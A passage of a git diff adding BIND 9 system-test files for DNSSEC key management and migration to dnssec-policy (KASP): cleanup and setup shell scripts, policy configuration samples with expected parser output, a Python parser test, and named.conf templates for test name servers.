https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +rm -f 18-nonstd-prepub/policy.conf +rm -f 19-old-keys/policy.conf +rm -f K*.key */K*.key +rm -f K*.private */K*.private +rm -f coverage.* keymgr.* settime.* +rm -f ns*/managed-keys.bind* +rm -f policy.conf +rm -f policy.out diff --git a/bin/tests/system/keymgr/policy.conf.in b/bin/tests/system/keymgr/policy.conf.in new file mode 100644 index 0000000..d6bc925 --- /dev/null +++ b/bin/tests/system/keymgr/policy.conf.in @@ -0,0 +1,23 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +policy default { + policy global; + algorithm @DEFAULT_ALGORITHM@; + key-size zsk 1024; + pre-publish zsk 6w; + post-publish zsk 6w; + roll-period zsk 6mo; + roll-period ksk 0; + coverage 364d; +}; diff --git a/bin/tests/system/keymgr/policy.good b/bin/tests/system/keymgr/policy.good new file mode 100644 index 0000000..eb23246 --- /dev/null +++ b/bin/tests/system/keymgr/policy.good @@ -0,0 +1,187 @@ +policy default: + inherits global + directory None + algorithm None + coverage None + ksk_keysize None + zsk_keysize None + ksk_rollperiod None + zsk_rollperiod None + ksk_prepublish None + ksk_postpublish None + zsk_prepublish None + zsk_postpublish None + ksk_standby None + zsk_standby None + keyttl None + +policy global: + inherits None + directory None + algorithm RSASHA256 + coverage 15552000 + ksk_keysize 2048 + zsk_keysize 2048 + ksk_rollperiod None + zsk_rollperiod 31536000 + ksk_prepublish 2592000 + ksk_postpublish 2592000 + zsk_prepublish 2592000 + zsk_postpublish 2592000 + ksk_standby None + zsk_standby None + keyttl 3600 + +constructed policy example.com: + inherits global + directory None + algorithm RSASHA256 + coverage 15552000 + ksk_keysize 2048 + zsk_keysize 2048 + ksk_rollperiod None + zsk_rollperiod 31536000 + ksk_prepublish 2592000 + ksk_postpublish 2592000 + zsk_prepublish 2592000 + zsk_postpublish 2592000 + ksk_standby None + zsk_standby None + keyttl 3600 + +policy default: + inherits None + directory "keydir" + algorithm RSASHA1 + coverage 31536000 + ksk_keysize None + zsk_keysize None + ksk_rollperiod None + zsk_rollperiod 15552000 + ksk_prepublish None + ksk_postpublish None + zsk_prepublish 3628800 + zsk_postpublish 3628800 + ksk_standby None + zsk_standby None + keyttl 3600 + +zone policy example.com: + inherits extra + directory "keydir" + algorithm NSEC3RSASHA1 + coverage 12960000 + ksk_keysize 2048 + zsk_keysize 2048 + ksk_rollperiod 31536000 + zsk_rollperiod 7776000 + ksk_prepublish 7776000 + ksk_postpublish None + zsk_prepublish 3628800 + zsk_postpublish 604800 + ksk_standby None + zsk_standby None + keyttl 7200 + +constructed policy example.org: + inherits None + directory "keydir" + algorithm RSASHA1 + coverage 31536000 + ksk_keysize 2048 + zsk_keysize 1024 + ksk_rollperiod None + zsk_rollperiod 15552000 + ksk_prepublish None + ksk_postpublish None + zsk_prepublish 3628800 + zsk_postpublish 3628800 + ksk_standby None + zsk_standby None + keyttl 3600 + +constructed policy example.net: + inherits None + directory "keydir" + algorithm RSASHA1 + coverage 31536000 + ksk_keysize 2048 + zsk_keysize 1024 + ksk_rollperiod None + zsk_rollperiod 15552000 + ksk_prepublish None + ksk_postpublish None + zsk_prepublish 3628800 + zsk_postpublish 3628800 + ksk_standby None + zsk_standby None + keyttl 3600 + +algorithm policy RSASHA1: + inherits None + directory None + algorithm None + coverage None + ksk_keysize 2048 + zsk_keysize 1024 + ksk_rollperiod None + zsk_rollperiod None + ksk_prepublish None + ksk_postpublish None + zsk_prepublish None + zsk_postpublish None + ksk_standby None + zsk_standby None + keyttl None + +algorithm policy RSASHA256: + inherits None + directory None + algorithm RSASHA256 + coverage None + ksk_keysize 2048 + zsk_keysize 2048 + ksk_rollperiod None + zsk_rollperiod None + ksk_prepublish None + ksk_postpublish None + zsk_prepublish None + zsk_postpublish None + ksk_standby None + zsk_standby None + keyttl None + +algorithm policy ECDSAP256SHA256: + inherits None + directory None + algorithm ECDSAP256SHA256 + coverage None + ksk_keysize None + zsk_keysize None + ksk_rollperiod None + zsk_rollperiod None + ksk_prepublish None + ksk_postpublish None + zsk_prepublish None + zsk_postpublish None + ksk_standby None + zsk_standby None + keyttl None + +policy extra: + inherits default + directory None + algorithm None + coverage 157680000 + ksk_keysize None + zsk_keysize None + ksk_rollperiod 31536000 + zsk_rollperiod 7776000 + ksk_prepublish 7776000 + ksk_postpublish None + zsk_prepublish None + zsk_postpublish 604800 + ksk_standby None + zsk_standby None + keyttl 7200 + diff --git a/bin/tests/system/keymgr/policy.sample b/bin/tests/system/keymgr/policy.sample new file mode 100644 index 0000000..8683e27 --- /dev/null +++ b/bin/tests/system/keymgr/policy.sample @@ -0,0 +1,60 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, You can obtain one at http://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +# a comment which should be skipped + +algorithm-policy rsasha1 { + key-size ksk 2048; + key-size zsk 1024; // this too +}; + +// and this + +policy default { + directory "keydir"; + algorithm rsasha1; + coverage 1y; # another comment + roll-period zsk 6mo; // and yet another + pre-publish zsk 6w; + post-publish zsk 6w; + keyttl 1h; +}; + +policy extra { + policy default; + coverage 5y; + roll-period KSK 1 year; + roll-period zsk 3mo; + pre-publish ksk 3mo; + post-publish zsk 1w; + keyttl 2h; +}; + +/* + * and this is also a comment, + * and it should be ignored like + * the others. + */ + +zone example.com { + policy extra; + coverage 5 mon; + algorithm nsec3rsasha1; +}; + +/* + * This confirms that zones starting with digits are accepted. + */ +zone "99example.com" { + policy global; +}; diff --git a/bin/tests/system/keymgr/setup.sh b/bin/tests/system/keymgr/setup.sh new file mode 100644 index 0000000..d7cef0c --- /dev/null +++ b/bin/tests/system/keymgr/setup.sh @@ -0,0 +1,192 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +KEYGEN="$KEYGEN -q" + +# Test 1: KSK goes inactive before successor is active +dir=01-ksk-inactive +echo_i "set up $dir" +ksk1=`$KEYGEN -K $dir -a ${DEFAULT_ALGORITHM} -3fk example.com` +$SETTIME -K $dir -I +9mo -D +1y $ksk1 > /dev/null 2>&1 +ksk2=`$KEYGEN -K $dir -S $ksk1` +$SETTIME -K $dir -I +7mo $ksk1 > /dev/null 2>&1 +zsk1=`$KEYGEN -K $dir -a ${DEFAULT_ALGORITHM} -3 example.com` + +# Test 2: ZSK goes inactive before successor is active +dir=02-zsk-inactive +echo_i "set up $dir" +zsk1=`$KEYGEN -K $dir -a ${DEFAULT_ALGORITHM} -3 example.com` +$SETTIME -K $dir -I +9mo -D +1y $zsk1 > /dev/null 2>&1 +zsk2=`$KEYGEN -K $dir -S $zsk1` +$SETTIME -K $dir -I +7mo $zsk1 > /dev/null 2>&1 +ksk1=`$KEYGEN -K $dir -a ${DEFAULT_ALGORITHM} -3fk example.com` + +# Test 3: KSK is unpublished before its successor is published +dir=03-ksk-unpublished +echo_i "set up $dir" +ksk1=`$KEYGEN -K $dir -a ${DEFAULT_ALGORITHM} -3fk example.com` +$SETTIME -K $dir -I +9mo -D +1y $ksk1 > /dev/null 2>&1 +ksk2=`$KEYGEN -K $dir -S $ksk1` +$SETTIME -K $dir -D +6mo $ksk1 > /dev/null 2>&1 +zsk1=`$KEYGEN -K $dir -a ${DEFAULT_ALGORITHM} -3 example.com` + +# Test 4: ZSK is unpublished before its successor is published +dir=04-zsk-unpublished +echo_i "set up $dir" +zsk1=`$KEYGEN -K $dir -a ${DEFAULT_ALGORITHM} -3 example.com` +$SETTIME -K $dir -I +9mo -D +1y $zsk1 > /dev/null 2>&1 +zsk2=`$KEYGEN -K $dir -S $zsk1` +$SETTIME -K $dir -D +6mo $zsk1 > /dev/null 2>&1 +ksk1=`$KEYGEN -K $dir -a ${DEFAULT_ALGORITHM} -3fk example.com` + +# Test 5: KSK deleted and successor published before KSK is deactivated +# and successor activated. +dir=05-ksk-unpub-active +echo_i "set up $dir" +ksk1=`$KEYGEN -K $dir -a ${DEFAULT_ALGORITHM} -3fk example.com` +$SETTIME -K $dir -I +9mo -D +8mo $ksk1 > /dev/null 2>&1 +ksk2=`$KEYGEN -K $dir -S $ksk1` +zsk1=`$KEYGEN -K $dir -a ${DEFAULT_ALGORITHM} -3 example.com` + +# Test 6: ZSK deleted and successor published before ZSK is deactivated +# and successor activated. +dir=06-zsk-unpub-active +echo_i "set up $dir" +zsk1=`$KEYGEN -K $dir -a ${DEFAULT_ALGORITHM} -3 example.com` +$SETTIME -K $dir -I +9mo -D +8mo $zsk1 > /dev/null 2>&1 +zsk2=`$KEYGEN -K $dir -S $zsk1` +ksk1=`$KEYGEN -K $dir -a ${DEFAULT_ALGORITHM} -3fk example.com` + +# Test 7: KSK rolled with insufficient delay after prepublication. +dir=07-ksk-ttl +echo_i "set up $dir" +ksk1=`$KEYGEN -K $dir -a ${DEFAULT_ALGORITHM} -3fk example.com` +$SETTIME -K $dir -I +9mo -D +1y $ksk1 > /dev/null 2>&1 +ksk2=`$KEYGEN -K $dir -S $ksk1` +$SETTIME -K $dir -P +269d $ksk2 > /dev/null 2>&1 +zsk1=`$KEYGEN -K $dir -a ${DEFAULT_ALGORITHM} -3 example.com` + +# Test 8: ZSK rolled with insufficient delay after prepublication. +dir=08-zsk-ttl +echo_i "set up $dir" +zsk1=`$KEYGEN -K $dir -a ${DEFAULT_ALGORITHM} -3 example.com` +$SETTIME -K $dir -I +9mo -D +1y $zsk1 > /dev/null 2>&1 +zsk2=`$KEYGEN -K $dir -S $zsk1` +# allow only 1 day between publication and activation +$SETTIME -K $dir -P +269d $zsk2 > /dev/null 2>&1 +ksk1=`$KEYGEN -K $dir -a ${DEFAULT_ALGORITHM} -3fk example.com` + +# Test 9: No special preparation needed + +# Test 10: Valid key set, but rollover period has changed +dir=10-change-roll +echo_i "set up $dir" +ksk1=`$KEYGEN -K $dir -a ${DEFAULT_ALGORITHM} -3fk example.com` +zsk1=`$KEYGEN -K $dir -a ${DEFAULT_ALGORITHM} -3 example.com` +$SETTIME -K $dir -I +3mo -D +4mo $zsk1 > /dev/null 2>&1 +zsk2=`$KEYGEN -K $dir -S $zsk1` + +# Test 11: Many keys all simultaneously scheduled to be active in the future +dir=11-many-simul +echo_i "set up $dir" +k1=`$KEYGEN -K $dir -a ${DEFAULT_ALGORITHM} -q3fk -P now+1mo -A now+1mo example.com` +z1=`$KEYGEN -K $dir -a ${DEFAULT_ALGORITHM} -q3 -P now+1mo -A now+1mo example.com` +z2=`$KEYGEN -K $dir -a ${DEFAULT_ALGORITHM} -q3 -P now+1mo -A now+1mo example.com` +z3=`$KEYGEN -K $dir -a ${DEFAULT_ALGORITHM} -q3 -P now+1mo -A now+1mo example.com` +z4=`$KEYGEN -K $dir -a ${DEFAULT_ALGORITHM} -q3 -P now+1mo -A now+1mo example.com` + +# Test 12: Many keys all simultaneously scheduled to be active in the past +dir=12-many-active +echo_i "set up $dir" +k1=`$KEYGEN -K $dir -a ${DEFAULT_ALGORITHM} -q3fk example.com` +z1=`$KEYGEN -K $dir -a ${DEFAULT_ALGORITHM} -q3 example.com` +z2=`$KEYGEN -K $dir -a ${DEFAULT_ALGORITHM} -q3 example.com` +z3=`$KEYGEN -K $dir -a ${DEFAULT_ALGORITHM} -q3 example.com` +z4=`$KEYGEN -K $dir -a ${DEFAULT_ALGORITHM} -q3 example.com` + +# Test 13: Multiple simultaneous keys with no configured roll period +dir=13-noroll +echo_i "set up $dir" +k1=`$KEYGEN -K $dir -a ${DEFAULT_ALGORITHM} -q3fk example.com` +k2=`$KEYGEN -K $dir -a ${DEFAULT_ALGORITHM} -q3fk example.com` +k3=`$KEYGEN -K $dir -a ${DEFAULT_ALGORITHM} -q3fk example.com` +z1=`$KEYGEN -K $dir -a ${DEFAULT_ALGORITHM} -q3 example.com` + +# Test 14: Keys exist but have the wrong algorithm +dir=14-wrongalg +echo_i "set up $dir" +k1=`$KEYGEN -K $dir -a ${ALTERNATIVE_ALGORITHM} -qfk example.com` +z1=`$KEYGEN -K $dir -a ${ALTERNATIVE_ALGORITHM} -q example.com` +$SETTIME -K $dir -I now+6mo -D now+8mo $z1 > /dev/null +z2=`$KEYGEN -K $dir -q -S ${z1}.key` +$SETTIME -K $dir -I now+1y -D now+14mo $z2 > /dev/null +z3=`$KEYGEN -K $dir -q -S ${z2}.key` +$SETTIME -K $dir -I now+18mo -D now+20mo $z3 > /dev/null +z4=`$KEYGEN -K $dir -q -S ${z3}.key` + +# Test 15: No zones specified; just search the directory for keys +dir=15-unspec +echo_i "set up $dir" +k1=`$KEYGEN -K $dir -a ${DEFAULT_ALGORITHM} -q3fk example.com` +z1=`$KEYGEN -K $dir -a ${DEFAULT_ALGORITHM} -q3 example.com` +$SETTIME -K $dir -I now+6mo -D now+8mo $z1 > /dev/null +z2=`$KEYGEN -K $dir -q -S ${z1}.key` +$SETTIME -K $dir -I now+1y -D now+14mo $z2 > /dev/null +z3=`$KEYGEN -K $dir -q -S ${z2}.key` +$SETTIME -K $dir -I now+18mo -D now+20mo $z3 > /dev/null +z4=`$KEYGEN -K $dir -q -S ${z3}.key` + +# Test 16: No zones specified; search the directory for keys; +# keys have the wrong algorithm for their policies +dir=16-wrongalg-unspec +echo_i "set up $dir" +k1=`$KEYGEN -K $dir -a ${ALTERNATIVE_ALGORITHM} -qfk example.com` +z1=`$KEYGEN -K $dir -a ${ALTERNATIVE_ALGORITHM} -q example.com` +$SETTIME -K $dir -I now+6mo -D now+8mo $z1 > /dev/null +z2=`$KEYGEN -K $dir -q -S ${z1}.key` +$SETTIME -K $dir -I now+1y -D now+14mo $z2 > /dev/null +z3=`$KEYGEN -K $dir -q -S ${z2}.key` +$SETTIME -K $dir -I now+18mo -D now+20mo $z3 > /dev/null +z4=`$KEYGEN -K $dir -q -S ${z3}.key` + +# Test 17: Keys are simultaneously active but we run with no force +# flag (this should fail) +dir=17-noforce +echo_i "set up $dir" +k1=`$KEYGEN -K $dir -a ${DEFAULT_ALGORITHM} -q3fk example.com` +z1=`$KEYGEN -K $dir -a ${DEFAULT_ALGORITHM} -q3 example.com` +z2=`$KEYGEN -K $dir -a ${DEFAULT_ALGORITHM} -q3 example.com` +z3=`$KEYGEN -K $dir -a ${DEFAULT_ALGORITHM} -q3 example.com` +z4=`$KEYGEN -K $dir -a ${DEFAULT_ALGORITHM} -q3 example.com` + +# Test 18: Prepublication interval is set to a nonstandard value +dir=18-nonstd-prepub +echo_i "set up $dir" +ksk1=`$KEYGEN -K $dir -a ${DEFAULT_ALGORITHM} -3fk example.com` +zsk1=`$KEYGEN -K $dir -a ${DEFAULT_ALGORITHM} -3 example.com` +$SETTIME -K $dir -I now+2mo -D now+3mo $zsk1 > /dev/null + +# Test 19: Key has been published/active a long time +dir=19-old-keys +echo_i "set up $dir" +ksk1=`$KEYGEN -K $dir -a ${DEFAULT_ALGORITHM} -3fk example.com` +zsk1=`$KEYGEN -K $dir -a ${DEFAULT_ALGORITHM} -3 example.com` +$SETTIME -K $dir -P now-2y -A now-2y $ksk1 > /dev/null +$SETTIME -K $dir -P now-2y -A now-2y $zsk1 > /dev/null + +copy_setports policy.conf.in policy.conf +copy_setports 18-nonstd-prepub/policy.conf.in 18-nonstd-prepub/policy.conf +copy_setports 19-old-keys/policy.conf.in 19-old-keys/policy.conf diff --git a/bin/tests/system/keymgr/testpolicy.py b/bin/tests/system/keymgr/testpolicy.py new file mode 100644 index 0000000..d63a079 --- /dev/null +++ b/bin/tests/system/keymgr/testpolicy.py @@ -0,0 +1,39 @@ +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +import sys +from isc import policy + +PP = policy.dnssec_policy() +# print the unmodified default and a generated zone policy +print(PP.named_policy["default"]) +print(PP.named_policy["global"]) +print(PP.policy("example.com")) + +if len(sys.argv) > 0: + for policy_file in sys.argv[1:]: + PP.load(policy_file) + + # now print the modified default and generated zone policies + print(PP.named_policy["default"]) + print(PP.policy("example.com")) + print(PP.policy("example.org")) + print(PP.policy("example.net")) + + # print algorithm policies + print(PP.alg_policy["RSASHA1"]) + print(PP.alg_policy["RSASHA256"]) + print(PP.alg_policy["ECDSAP256SHA256"]) + + # print another named policy + print(PP.named_policy["extra"]) +else: + print("ERROR: Please provide an input file") diff --git a/bin/tests/system/keymgr/tests.sh b/bin/tests/system/keymgr/tests.sh new file mode 100644 index 0000000..667277f --- /dev/null +++ b/bin/tests/system/keymgr/tests.sh @@ -0,0 +1,146 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +status=0 +n=1 + +matchall () { + match_result=ok + file=$1 + while IFS="," read expect matchline; do + [ -z "$matchline" ] && continue + matches=`grep "$matchline" $file | wc -l` + [ "$matches" -ne "$expect" ] && { + echo "'$matchline': expected $expect found $matches" + return 1 + } + done << EOF + $2 +EOF + return 0 +} + +echo_i "checking for DNSSEC key coverage issues" +ret=0 +for dir in [0-9][0-9]-*; do + ret=0 + echo_i "$dir ($n)" + kargs= cargs= kmatch= cmatch= kret= cret=0 warn= error= ok= + . $dir/expect + + # use policy.conf if available + policy="" + if [ -e "$dir/policy.conf" ]; then + policy="-c $dir/policy.conf" + if grep -e "-c policy.conf" $dir/expect > /dev/null + then + echo_i "fix $dir/expect: multiple policy files" + ret=1 + fi + else + policy="-c policy.conf" + fi + + # run keymgr to update keys + if [ "$CYGWIN" ]; then + $KEYMGR $policy -K $dir -g `cygpath -w $KEYGEN` \ + -s `cygpath -w $SETTIME` $kargs > keymgr.$n 2>&1 + else + $KEYMGR $policy -K $dir -g $KEYGEN \ + -s $SETTIME $kargs > keymgr.$n 2>&1 + fi + # check that return code matches expectations + found=$? + if [ $found -ne $kret ]; then + echo "keymgr retcode was $found expected $kret" + ret=1 + fi + + # check for matches in keymgr output + matchall keymgr.$n "$kmatch" || ret=1 + + # now check coverage + $COVERAGE -K $dir $cargs > coverage.$n 2>&1 + # check that return code matches expectations + found=$? + if [ $found -ne $cret ]; then + echo "coverage retcode was $found expected $cret" + ret=1 + fi + + # check for correct number of errors + found=`grep ERROR coverage.$n | wc -l` + if [ $found -ne $error ]; then + echo "error count was $found expected $error" + ret=1 + fi + + # check for correct number of warnings + found=`grep WARNING coverage.$n | wc -l` + if [ $found -ne $warn ]; then + echo "warning count was $found expected $warn" + ret=1 + fi + + # check for correct number of OKs + found=`grep "No errors found" coverage.$n | wc -l` + if [ $found -ne $ok ]; then + echo "good count was $found expected $ok" + ret=1 + fi + + # check for matches in coverage output + matchall coverage.$n "$cmatch" || ret=1 + + if [ -f $dir/extra.sh ]; then + cd $dir + . ./extra.sh + cd .. + fi + + n=`expr $n + 1` + if [ $ret != 0 ]; then echo_i "failed"; fi + status=`expr $status + $ret` +done + +echo_i "checking domains ending in . ($n)" +ret=0 +$KEYMGR -g $KEYGEN -s $SETTIME . > keymgr.1.$n 2>&1 +nkeys=`grep dnssec-keygen keymgr.1.$n | wc -l` +[ "$nkeys" -eq 2 ] || ret=1 +$KEYMGR -g $KEYGEN -s $SETTIME . > keymgr.2.$n 2>&1 +nkeys=`grep dnssec-keygen keymgr.2.$n | wc -l` +[ "$nkeys" -eq 0 ] || ret=1 +$KEYMGR -g $KEYGEN -s $SETTIME example.com. > keymgr.3.$n 2>&1 +nkeys=`grep dnssec-keygen keymgr.3.$n | wc -l` +[ "$nkeys" -eq 2 ] || ret=1 +$KEYMGR -g $KEYGEN -s $SETTIME example.com. > keymgr.4.$n 2>&1 +nkeys=`grep dnssec-keygen keymgr.4.$n | wc -l` +[ "$nkeys" -eq 0 ] || ret=1 +status=`expr $status + $ret` +n=`expr $n + 1` + +echo_i "checking policy.conf parser ($n)" +ret=0 +PYTHONPATH="../../../python:$PYTHONPATH" ${PYTHON} testpolicy.py policy.sample > policy.out +$DOS2UNIX policy.out > /dev/null 2>&1 +cmp -s policy.good policy.out || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` +n=`expr $n + 1` + +echo_i "exit status: $status" +[ $status -eq 0 ] || exit 1 diff --git a/bin/tests/system/keymgr2kasp/README b/bin/tests/system/keymgr2kasp/README new file mode 100644 index 0000000..f941209 --- /dev/null +++ b/bin/tests/system/keymgr2kasp/README @@ -0,0 +1,17 @@ +Copyright (C) Internet Systems Consortium, Inc. ("ISC") + +SPDX-License-Identifier: MPL-2.0 + +This Source Code Form is subject to the terms of the Mozilla Public +License, v. 2.0. If a copy of the MPL was not distributed with this +file, you can obtain one at https://mozilla.org/MPL/2.0/. + +See the COPYRIGHT file distributed with this work for additional +information regarding copyright ownership. + +The test setup for migrating to KASP tests. + +ns3 is an authoritative server for the various test domains. + +ns4 is an authoritative server that tests a specific case where zones +using views migrate to dnssec-policy. diff --git a/bin/tests/system/keymgr2kasp/clean.sh b/bin/tests/system/keymgr2kasp/clean.sh new file mode 100644 index 0000000..1fe2bb9 --- /dev/null +++ b/bin/tests/system/keymgr2kasp/clean.sh @@ -0,0 +1,34 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +set -e + +rm -f ns*/K*.private ns*/K*.key ns*/K*.state +rm -f ns*/named.conf ns*/kasp.conf +rm -f ns*/named.memstats ns*/named.run +rm -f ns*/keygen.out* ns*/signer.out* +rm -f ns*/zones +rm -f ns*/dsset-* +rm -f ns*/*.db ns*/*.db.jnl ns*/*.db.jbk +rm -f ns*/*.db.signed* ns*/*.db.infile +rm -f ns*/managed-keys.bind* +rm -f ns*/*.mkeys* +rm -f ./*.created +rm -f ./created.key-* +rm -f ./dig.out* +rm -f ./python.out.* +rm -f ./retired.* +rm -f ./rndc.dnssec.* +rm -f ./unused.key* +rm -f ./verify.out.* + diff --git a/bin/tests/system/keymgr2kasp/ns3/kasp.conf.in b/bin/tests/system/keymgr2kasp/ns3/kasp.conf.in new file mode 100644 index 0000000..0dae201 --- /dev/null +++ b/bin/tests/system/keymgr2kasp/ns3/kasp.conf.in @@ -0,0 +1,84 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +dnssec-policy "migrate" { + dnskey-ttl 7200; + + keys { + ksk key-directory lifetime unlimited algorithm @DEFAULT_ALGORITHM@; + zsk key-directory lifetime P60D algorithm @DEFAULT_ALGORITHM@; + }; +}; + +dnssec-policy "timing-metadata" { + dnskey-ttl 300; + + signatures-refresh P1W; + signatures-validity P2W; + signatures-validity-dnskey P2W; + + keys { + ksk key-directory lifetime P60D algorithm @DEFAULT_ALGORITHM@; + zsk key-directory lifetime P60D algorithm @DEFAULT_ALGORITHM@; + }; + + // Together 12h + zone-propagation-delay 3600; + max-zone-ttl 11h; + + // Together 3h + parent-propagation-delay pt1h; + parent-ds-ttl 7200; +}; + +/* + * This policy tests migration from existing keys with 1024 bits RSASHA1 keys + * to ECDSAP256SHA256 keys. + */ +dnssec-policy "migrate-nomatch-algnum" { + dnskey-ttl 300; + + keys { + ksk key-directory lifetime unlimited algorithm ecdsa256; + zsk key-directory lifetime P60D algorithm ecdsa256; + }; + + // Together 12h + zone-propagation-delay 3600; + max-zone-ttl 11h; + + // Together 3h + parent-propagation-delay pt1h; + parent-ds-ttl 7200; +}; + +/* + * This policy tests migration from existing keys with 2048 bits RSASHA256 keys + * to 3072 bits RSASHA256 keys. + */ +dnssec-policy "migrate-nomatch-alglen" { + dnskey-ttl 300; + + keys { + ksk key-directory lifetime unlimited algorithm rsasha256 3072; + zsk key-directory lifetime P60D algorithm rsasha256 3072; + }; + + // Together 12h + zone-propagation-delay 3600; + max-zone-ttl 11h; + + // Together 3h + parent-propagation-delay pt1h; + parent-ds-ttl 7200; +}; diff --git a/bin/tests/system/keymgr2kasp/ns3/named.conf.in b/bin/tests/system/keymgr2kasp/ns3/named.conf.in new file mode 100644 index 0000000..5a71a87 --- /dev/null +++ b/bin/tests/system/keymgr2kasp/ns3/named.conf.in @@ -0,0 +1,98 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +// NS3 + +options { + query-source address 10.53.0.3; + notify-source 10.53.0.3; + transfer-source 10.53.0.3; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.3; }; + listen-on-v6 { none; }; + allow-transfer { any; }; + recursion no; + key-directory "."; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.3 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +/* These are zones that migrate to dnssec-policy. */ +zone "migrate.kasp" { + type primary; + file "migrate.kasp.db"; + auto-dnssec maintain; + allow-update { any; }; + dnssec-dnskey-kskonly yes; + update-check-ksk yes; +}; + +zone "csk.kasp" { + type primary; + file "csk.kasp.db"; + auto-dnssec maintain; + allow-update { any; }; + dnssec-dnskey-kskonly no; +}; + +zone "csk-nosep.kasp" { + type primary; + file "csk-nosep.kasp.db"; + auto-dnssec maintain; + allow-update { any; }; + dnssec-dnskey-kskonly no; +}; + +zone "rumoured.kasp" { + type primary; + file "rumoured.kasp.db"; + auto-dnssec maintain; + allow-update { any; }; + dnssec-dnskey-kskonly yes; + update-check-ksk yes; +}; + +zone "omnipresent.kasp" { + type primary; + file "omnipresent.kasp.db"; + auto-dnssec maintain; + allow-update { any; }; + dnssec-dnskey-kskonly yes; + update-check-ksk yes; +}; + +zone "migrate-nomatch-algnum.kasp" { + type primary; + file "migrate-nomatch-algnum.kasp.db"; + auto-dnssec maintain; + allow-update { any; }; + dnssec-dnskey-kskonly yes; + update-check-ksk yes; +}; + +zone "migrate-nomatch-alglen.kasp" { + type primary; + file "migrate-nomatch-alglen.kasp.db"; + auto-dnssec maintain; + allow-update { any; }; + dnssec-dnskey-kskonly yes; + update-check-ksk yes; +}; diff --git a/bin/tests/system/keymgr2kasp/ns3/named2.conf.in b/bin/tests/system/keymgr2kasp/ns3/named2.conf.in new file mode 100644 index 0000000..8d5aecb --- /dev/null +++ b/bin/tests/system/keymgr2kasp/ns3/named2.conf.in @@ -0,0 +1,87 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +// NS3 + +include "kasp.conf"; + +options { + query-source address 10.53.0.3; + notify-source 10.53.0.3; + transfer-source 10.53.0.3; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.3; }; + listen-on-v6 { none; }; + allow-transfer { any; }; + recursion no; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.3 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +/* These are zones that migrate to dnssec-policy. */ +zone "migrate.kasp" { + type primary; + file "migrate.kasp.db"; + allow-update { any; }; + dnssec-policy "migrate"; +}; + +zone "csk.kasp" { + type primary; + file "csk.kasp.db"; + allow-update { any; }; + dnssec-policy "default"; +}; + +zone "csk-nosep.kasp" { + type primary; + file "csk-nosep.kasp.db"; + allow-update { any; }; + dnssec-policy "default"; +}; + +zone "rumoured.kasp" { + type primary; + file "rumoured.kasp.db"; + allow-update { any; }; + dnssec-policy "timing-metadata"; +}; + +zone "omnipresent.kasp" { + type primary; + file "omnipresent.kasp.db"; + 